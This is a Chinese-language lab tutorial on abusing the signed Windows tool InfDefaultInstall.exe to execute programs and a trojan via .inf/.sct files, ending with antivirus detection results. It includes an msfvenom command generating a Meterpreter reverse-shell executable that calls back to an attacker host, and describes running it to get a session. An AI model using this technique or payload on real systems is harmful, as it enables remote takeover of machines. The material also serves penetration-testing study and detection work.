當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x02 利用InfDefaultInstall.exe執行程序
0x03 利用InfDefaultInstall.exe執行payload
0x01 InfDefaultInstall.exe簡介
InfDefaultInstall.exe是一個用來進行inf安裝的工具,具有微軟簽名,存在路徑爲:
C:\Windows\System32\Infdefaultinstall.exe
C:\Windows\SysWOW64\Infdefaultinstall.exe
我們可以通過直接該文件後面跟inf文件來進行繞過一些限制
0x02 利用InfDefaultInstall.exe執行程序
Poc地址如下:https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
在本機進行示例,以下爲shady2.inf的代碼
以下爲shady.sct的代碼,可以看到最後是調出notepad.exe的
在cmd窗口中運行
InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
0x03 利用InfDefaultInstall.exe執行payload
靶機:windows 10 ip地址:172.16.111.194
攻擊機:kali linux ip地址:172.16.111.222
首先使用msf生成exe格式的shellcode
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
將生成的exe木馬複製到靶機,備份一份shady222.inf並更改shady.sct中的文件路徑爲hacker.exe
在msf中設置監聽
靶機中使用InfDefaultInstall.exe運行shady222.inf
攻擊機kali成功監聽到靶機上線
以下爲靶機安裝360全家桶和火絨殺毒後的InfDefaultInstall.exe執行效果:360全家桶報毒,kali無法監聽。
火絨報毒,kali無法監聽。
參考鏈接:
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
雖然我們生活在陰溝裏,但依然有人仰望星空!